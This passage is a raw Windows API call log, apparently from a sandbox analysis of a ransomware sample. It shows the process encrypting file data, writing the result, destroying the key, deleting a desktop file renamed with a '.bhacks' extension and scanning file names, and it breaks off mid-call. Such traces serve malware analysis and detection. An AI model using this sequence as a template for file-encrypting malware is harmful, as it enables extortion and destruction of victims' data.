[0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0101.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0101.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.705] CryptEncrypt (in: hKey=0x9a4780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x9420, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x9428) returned 1 [0101.705] CharLowerBuffW (in: lpsz="byte[37928]", cchLength=0xb | out: lpsz="byte[37928]") returned 0xb [0101.708] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.708] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0101.710] CryptEncrypt (in: hKey=0x9a4780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a95da8*, pdwDataLen=0x8cef60*=0x9420, dwBufLen=0x9428 | out: pbData=0x2a95da8*, pdwDataLen=0x8cef60*=0x9428) returned 1 [0101.711] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.711] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.712] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.712] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.712] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.712] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.716] WriteFile (in: hFile=0x44c, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0x9428, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0x9428, lpOverlapped=0x0) returned 1 [0101.717] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0101.718] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0101.718] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.718] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9a48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0101.718] CryptDestroyKey (hKey=0x9a4780) returned 1 [0101.718] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.718] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.718] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.718] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.718] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.718] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.718] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.718] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.718] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.718] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.720] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.720] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.720] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.720] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.720] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.720] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7120, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0101.721] CryptReleaseContext (hProv=0x9beab0, dwFlags=0x0) returned 1 [0101.721] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.721] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.721] FreeLibrary (hLibModule=0x76390000) returned 1 [0101.721] CloseHandle (hObject=0x458) returned 1 [0101.723] CloseHandle (hObject=0x44c) returned 1 [0101.726] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.726] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.726] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/JkNoq.avi.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi.bhacks", lpFilePart=0x8cedf4*="JkNoq.avi.bhacks") returned 0x28 [0101.726] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\jknoq.avi.bhacks")) returned 0x20 [0101.726] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x249d9033, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x249d9033, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24c15251, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x9420, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="JkNoq.avi.bhacks", cAlternateFileName="JKNOQA~1.BHA")) returned 0x9a3b80 [0101.726] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\jknoq.avi.bhacks")) returned 1 [0101.727] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x249d9033, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x249d9033, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24c15251, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x9420, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="JkNoq.avi.bhacks", cAlternateFileName="JKNOQA~1.BHA")) returned 0 [0101.727] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0101.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75240 | out: hHeap=0x2af0000) returned 1 [0101.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.727] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.727] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0101.728] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.728] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0101.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.728] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75df8 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0101.729] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5f6c0 [0101.729] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/JkNoq.avi.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi.bhacks", lpFilePart=0x8cf650*="JkNoq.avi.bhacks") returned 0x28 [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0101.729] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\JkNoq.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\jknoq.avi.bhacks")) returned 0xffffffff [0101.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75df8 | out: hHeap=0x2af0000) returned 1 [0101.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0101.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0101.730] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0101.730] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.730] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0101.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0101.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0101.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0101.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0101.730] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0101.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0101.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J_gUxI4K04bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_gUxI4K04bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gUxI4K04bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UxI4K04bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xI4K04bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I4K04bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4K04bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K04bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="04bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bkqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kqo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qo7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tW4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.731] CompareStringW 